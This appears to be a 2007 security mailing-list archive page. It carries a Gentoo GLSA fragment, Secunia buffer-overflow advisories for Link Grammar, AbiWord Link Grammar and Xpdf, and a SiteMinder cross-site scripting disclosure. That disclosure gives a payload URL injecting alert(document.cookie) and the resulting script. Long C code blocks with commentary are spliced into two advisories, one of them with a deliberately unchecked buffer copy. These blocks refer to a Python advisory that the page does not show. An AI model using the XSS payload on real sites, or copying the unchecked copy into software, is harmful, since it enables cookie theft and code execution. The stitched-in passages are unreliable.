  [ 1 ] CVE-2006-5752
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5752
  [ 2 ] CVE-2007-1862
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1862
  [ 3 ] CVE-2007-1863
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1863
  [ 4 ] CVE-2007-3304
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3304
  [ 5 ] CVE-2007-3847
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3847
  [ 6 ] CVE-2007-4465
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4465

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-06.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHMhKguhJ+ozIKI5gRAilbAJ4lvKMYl87wxBxHtrvhMz7db3yDEACeNQnV
UfU90XjcEHARQCFOy/+MtlY=
=ZTI0
-END PGP SIGNATURE-


Secunia Research: Link Grammar "separate_sentence()" Buffer Overflow

2007-11-07 Thread Secunia Research
== 

 Secunia Research 07/11/2007

  - Link Grammar "separate_sentence()" Buffer Overflow -

== 
Table of Contents

Affected Software........................................1
Severity.................................................2
Vendor's Description of Software.........................3
Description of Vulnerability.............................4
Solution.................................................5
Time Table...............................................6
Credits..................................................7
References...............................................8
About Secunia............................................9
Verification............................................10

== 
1) Affected Software 

* Link Grammar 4.1b.

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Moderately critical
Impact: System access
Where:  Remote

== 
3) Vendor's Description of Software 

"The Link Grammar Parser is a syntactic parser of English, based on
link grammar, an original theory of English syntax. Given a sentence,
the system assigns to it a syntactic structure, which consists of a 
set of labeled links connecting pairs of words. The parser also 
produces a "constituent" representation of a sentence (showing noun 
phrases, verb phrases, etc.)"

Product Link:
http://www.link.cs.cmu.edu/link/

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Link Grammar, which
can be exploited by malicious people to compromise an application 
using the affected code.

The vulnerability is caused due to a boundary error within the
"separate_word()" function in tokenize.c when processing overly long
words (over 61 bytes). This can be exploited to cause a stack-based
buffer overflow via a specially crafted sentence passed to the
"separate_sentence()" function.

Successful exploitation allows execution of arbitrary code.

== 
5) Solution 

Do not parse untrusted text using the affected function.

== 
6) Time Table 

23/10/2007 - Vendor notified.
07/11/2007 - Public disclosure.

== 
7) Credits 

Discovered by Alin Rad Pop, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2007-5395 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/ 

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2007-78/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==



Secunia Research: AbiWord Link Grammar "separate_sentence()" Buffer Overflow

2007-11-07 Thread Secunia Research
== 

 Secunia Research 07/11/2007

 - AbiWord Link Grammar "separate_sentence()" Buffer Overflow -

== 
Table of Contents

Affected Software........................................1
Severity.................................................2
Vendor's Description of Software.........................3
Description of Vulnerability.............................4
Solution.................................................5
Time Table...............................................6
Credits..................................................7
References...............................................8
About Secunia............................................9
Verification............................................10

== 
1) Affected Software 

* AbiWord Link Grammar 4.2.4.

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System access
Where: From remote

== 
3) Vendor's Description of Software 

"The Link Grammar Parser is a syntactic parser of English, based on
link grammar, an original theory of English syntax. Given a sentence,
the system assigns to it a syntactic structure, which consists of a 
set of labeled links connecting pairs of words. The parser also 
produces a "constituent" representation of a sentence (showing noun 
phrases, verb phrases, etc.)"

Product Link:
http://www.abisource.com/projects/link-grammar/

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in AbiWord Link
Grammar, which can be exploited by malicious people to compromise an
application using the library.

The vulnerability is caused due to a boundary error within the
"separate_word()" function in tokenize.c when processing overly long
words (over 61 bytes). This can be exploited to cause a stack-based
buffer overflow via a specially crafted sentence passed to the
"separate_sentence()" function.

Successful exploitation allows execution of arbitrary code.
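The tokenizer shape that both Secunia advisories on this page describe (separate_sentence() splitting text into words, separate_word() copying each into a 61-byte stack buffer), as an added example that is neither the CMU nor the AbiWord Link Grammar source. The unchecked copy is shown beside the bounded one; MAX_WORD = 60, the word-count limit, the error codes and the inputs are assumptions for the demonstration.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the Link Grammar source.  A sentence is split on
 * whitespace and each token is copied into a fixed per-word buffer, the
 * shape the advisories describe for separate_sentence() and separate_word().
 * MAX_WORD is 60, so the buffer is 61 bytes: a word over 61 bytes is exactly
 * what the original copied without checking. */

#define MAX_WORD  60
#define MAX_WORDS 64

enum { TOK_OK = 0, TOK_WORD_TOO_LONG = -1, TOK_TOO_MANY_WORDS = -2 };

struct sentence {
    int  nwords;
    char word[MAX_WORDS][MAX_WORD + 1];
};

/* The vulnerable shape (never call it on untrusted input): nothing compares
 * the token length with the 61-byte stack buffer, so a longer token writes
 * past it into the saved frame pointer and return address. */
int separate_word_unchecked(const char *s, size_t n)
{
    char word[MAX_WORD + 1];
    memcpy(word, s, n);
    word[n] = '\0';
    return (int)strlen(word);
}

/* Hardened: refuse the token before touching the buffer.  Truncating
 * instead would also be memory-safe but silently changes the parse. */
static int separate_word(const char *s, size_t n, char dst[MAX_WORD + 1])
{
    if (n > MAX_WORD)
        return TOK_WORD_TOO_LONG;
    memcpy(dst, s, n);
    dst[n] = '\0';
    return TOK_OK;
}

int separate_sentence(const char *text, struct sentence *out)
{
    const char *p = text;

    out->nwords = 0;
    for (;;) {
        while (*p && isspace((unsigned char)*p))
            p++;
        if (!*p)
            return TOK_OK;
        const char *start = p;
        while (*p && !isspace((unsigned char)*p))
            p++;
        if (out->nwords == MAX_WORDS)
            return TOK_TOO_MANY_WORDS;
        int rc = separate_word(start, (size_t)(p - start), out->word[out->nwords]);
        if (rc != TOK_OK)
            return rc;
        out->nwords++;
    }
}

/* Returns the word count, or the negative error code. */
int count_words(const char *text)
{
    struct sentence s;
    int rc = separate_sentence(text, &s);
    return rc == TOK_OK ? s.nwords : rc;
}

/* Builds "hello <n x's> world" (a constructed input) and tokenizes it. */
int check_word_of_length(size_t n)
{
    char buf[512];
    if (n > 400)
        return -99;
    memcpy(buf, "hello ", 6);
    memset(buf + 6, 'x', n);
    memcpy(buf + 6 + n, " world", 7);   /* includes the terminating NUL */
    return count_words(buf);
}

int main(void)
{
    printf("%d words; 60-byte word: %d; 61-byte word: %d\n",
           count_words("The quick brown fox"),
           check_word_of_length(60), check_word_of_length(61));
    return 0;
}
```

Rejecting the sentence is the right behaviour for a library whose callers (a word processor's grammar checker, here) pass it text they did not write; the CMU advisory's "do not parse untrusted text" workaround is what a caller is left with when the library does not make this check itself.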

== 
5) Solution 

Fixed in the CVS repository.

== 
6) Time Table 

23/10/2007 - Vendor notified.
23/10/2007 - vendor-sec notified.
24/10/2007 - Vendor response.
07/11/2007 - Public disclosure.

== 
7) Credits 

Discovered by Alin Rad Pop, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2007-5395 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/ 

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2007-79/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==



SiteMinder Agent: Cross Site Scripting

2007-11-07 Thread Giuseppe Gottardi
# Exploit in [XSS]:

https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=[XSS]


# Cross Site Scripting (Code):

https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0

In this way we can inject the alert() code without brackets in the
function resetCredFields().


---
function resetCredFields()
{

if (1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 0 || 1)
{
alert(document.cookie);
}
}
function drop(){

if( 0 == 4 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 5 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 28 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 30 )
{
document.PWChange.PASSWORD.value = '';
}
else if (1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 1 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 18 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 20 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 22 || 1)
{
alert(document.cookie);
}
}

function drop(){

if( 0 == 31 || 1)
{
alert(document.cookie);
}
}
function drop(){

if( 0 == 34)
{
document.PWChange.NEWPASSWORD.value = '';
document.PWChange.CONFIRMATION.value = '';
}
}
...

---


Regards,
Giuseppe Gottardi (aka oveRet)

---
Giuseppe Gottardi
Senior Security Engineer at Communication Valley S.p.A.
E-mail: [EMAIL PROTECTED]
Web: http://overet.securitydate.it

Wednesday November 07, 2007.


Secunia Research: Xpdf "Stream.cc" Multiple Vulnerabilities

2007-11-07 Thread Secunia Research
== 

 Secunia Research 07/11/2007

 - Xpdf "Stream.cc" Multiple Vulnerabilities -

== 
Table of Contents

Affected Software........................................1
Severity.................................................2
Vendor's Description of Software.........................3
Description of Vulnerability.............................4
Solution.................................................5
Time Table...............................................6
Credits..................................................7
References...............................................8
About Secunia............................................9
Verification............................................10

== 
1) Affected Software 

* Xpdf 3.02 with xpdf-3.02pl1.patch.

NOTE: Other versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System access
Where:  Remote

== 
3) Vendor's Description of Software 

"Xpdf is an open source viewer for Portable Document Format (PDF)
files. (These are also sometimes also called 'Acrobat' files, from the
name of Adobe's PDF software.) The Xpdf project also includes a PDF
text extractor, PDF-to-PostScript converter, and various other
utilities.".

Product Link:
http://www.foolabs.com/xpdf/

== 
4) Description of Vulnerabilities

Secunia Research has discovered some vulnerabilities in Xpdf, which can
be exploited by malicious people to compromise a user's system.

1) An array indexing error within the
"DCTStream::readProgressiveDataUnit()" method in xpdf/Stream.cc can be
exploited to corrupt memory via a specially crafted PDF file.

2) An integer overflow error within the "DCTStream::reset()" method in
xpdf/Stream.cc can be exploited to cause a heap-based buffer overflow
via a specially crafted PDF file.

3) A boundary error within the "CCITTFaxStream::lookChar()" method in
xpdf/Stream.cc can be exploited to cause a heap-based buffer overflow
by tricking a user into opening a PDF file containing a specially
crafted "CCITTFaxDecode" filter.

Successful exploitation may allow execution of arbitrary code.
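Two of the failure classes listed above, an array index taken straight from the file (item 1) and an integer overflow in a buffer-size computation (item 2), are also what the Python imageop advisory earlier on this page (GLSA 200711-07) describes, so one added example covers both. It is not Xpdf or CPython code: a wrap-free image buffer size computation with a sanity cap sits beside the 32-bit arithmetic that wraps, and a JPEG Start-Of-Scan parser range-checks the Huffman table selectors before they can be used as indices. The cap, the error codes, the 4-slot table count and the sample scan headers are assumptions constructed for the demonstration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Added example, not Xpdf or CPython code.  Two checks that decoders of
 * attacker-supplied images need before touching memory: a buffer-size
 * computation that cannot wrap, and range checks on every value read from
 * the file that later becomes an array index. */

#define MAX_IMAGE_BYTES  (256u * 1024u * 1024u)   /* sanity cap, assumed */
#define NUM_HUFF_TABLES  4                         /* DC/AC table slots a decoder keeps */
#define MAX_COMPS        4

enum { DCT_OK = 0, DCT_TRUNCATED = -1, DCT_BAD_NCOMPS = -2,
       DCT_UNKNOWN_COMP = -3, DCT_BAD_TABLE = -4 };

/* What 2007-era code did: width * height * bpp in 32-bit arithmetic, which
 * wraps to a small number, so a small buffer is allocated for a huge image. */
int32_t naive_size_32(uint32_t width, uint32_t height, uint32_t bpp)
{
    return (int32_t)(width * height * bpp);
}

/* Checked version: the first product cannot wrap in 64 bits, the second is
 * tested before it happens, and the result is held under a fixed cap so an
 * absurd but non-wrapping size cannot be used for a denial of service. */
int image_buffer_size(uint32_t width, uint32_t height, uint32_t bpp, size_t *out)
{
    if (width == 0 || height == 0 || bpp == 0)
        return -1;
    uint64_t px = (uint64_t)width * height;
    if (px > UINT64_MAX / bpp)
        return -1;
    uint64_t bytes = px * bpp;
    if (bytes > MAX_IMAGE_BYTES)
        return -1;
    *out = (size_t)bytes;
    return 0;
}

long checked_size(uint32_t width, uint32_t height, uint32_t bpp)
{
    size_t n;
    return image_buffer_size(width, height, bpp, &n) == 0 ? (long)n : -1;
}

struct scan {
    int ncomps;
    int comp_idx[MAX_COMPS];   /* index into the frame's component list */
    int dc_table[MAX_COMPS];   /* Huffman table selectors, each < NUM_HUFF_TABLES */
    int ac_table[MAX_COMPS];
};

/* Parses a JPEG Start-Of-Scan body: Ns, then Ns pairs of (component id,
 * DC/AC table selector nibbles).  Each selector is validated here because it
 * is used later as an index into the table array; a decoder that skips this
 * check indexes out of bounds on a crafted scan header. */
int parse_sos(const uint8_t *d, size_t len,
              const uint8_t *frame_comp_ids, int frame_ncomps, struct scan *out)
{
    if (len < 1)
        return DCT_TRUNCATED;
    int ns = d[0];
    if (ns < 1 || ns > MAX_COMPS || ns > frame_ncomps)
        return DCT_BAD_NCOMPS;
    if (len < 1 + 2 * (size_t)ns)
        return DCT_TRUNCATED;
    for (int i = 0; i < ns; i++) {
        uint8_t cid = d[1 + 2 * i], sel = d[2 + 2 * i];
        int idx = -1;
        for (int j = 0; j < frame_ncomps; j++)
            if (frame_comp_ids[j] == cid)
                idx = j;
        if (idx < 0)
            return DCT_UNKNOWN_COMP;
        int td = sel >> 4, ta = sel & 0x0f;
        if (td >= NUM_HUFF_TABLES || ta >= NUM_HUFF_TABLES)
            return DCT_BAD_TABLE;
        out->comp_idx[i] = idx;
        out->dc_table[i] = td;
        out->ac_table[i] = ta;
    }
    out->ncomps = ns;
    return DCT_OK;
}

/* Constructed scan headers for a 3-component (YCbCr) frame. */
static const uint8_t frame_ids[3]    = { 1, 2, 3 };
static const uint8_t sos_good[]      = { 3, 1, 0x00, 2, 0x11, 3, 0x11 };
static const uint8_t sos_bad_table[] = { 3, 1, 0x00, 2, 0x11, 3, 0x5f };  /* DC table 5 */
static const uint8_t sos_unknown[]   = { 1, 9, 0x00 };                    /* no component 9 */

int check_sos(int which)
{
    struct scan s;
    switch (which) {
    case 0:  return parse_sos(sos_good, sizeof sos_good, frame_ids, 3, &s) == DCT_OK ? s.ncomps : -99;
    case 1:  return parse_sos(sos_bad_table, sizeof sos_bad_table, frame_ids, 3, &s);
    default: return parse_sos(sos_unknown, sizeof sos_unknown, frame_ids, 3, &s);
    }
}

int main(void)
{
    printf("640x480x3: %ld bytes; 65536x65536x4 naive: %d, checked: %ld\n",
           checked_size(640, 480, 3), naive_size_32(65536, 65536, 4),
           checked_size(65536, 65536, 4));
    printf("sos good: %d, bad table: %d, unknown comp: %d\n",
           check_sos(0), check_sos(1), check_sos(2));
    return 0;
}
```

A 65536 by 65536 image with 4 bytes per pixel needs 2^34 bytes; the 32-bit product is 0, so the naive code would allocate nothing and then write 2^34 bytes into it, while the checked version refuses it outright. The selector check is the same discipline applied to an index: the table array has four slots, so a selector of 5 is rejected at parse time rather than when the decoder first dereferences tables[5].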

== 
5) Solution 

Do not open untrusted PDF files.

The vendor is reportedly working on a patch.

== 
6) Time Table 

17/10/2007 - Vendor notified.
19/10/2007 - Vendor response.
22/10/2007 - vendor-sec notified.
07/11/2007 - Public disclosure.

== 
7) Credits 

Discovered by Alin Rad Pop, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned the
following CVE identifiers:
* CVE-2007-4352 ("DCTStream::readProgressiveDataUnit()")
* CVE-2007-5392 ("DCTStream::reset()")
* CVE-2007-5393 ("CCITTFaxStream::lookChar()")

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/ 

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2007-88/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==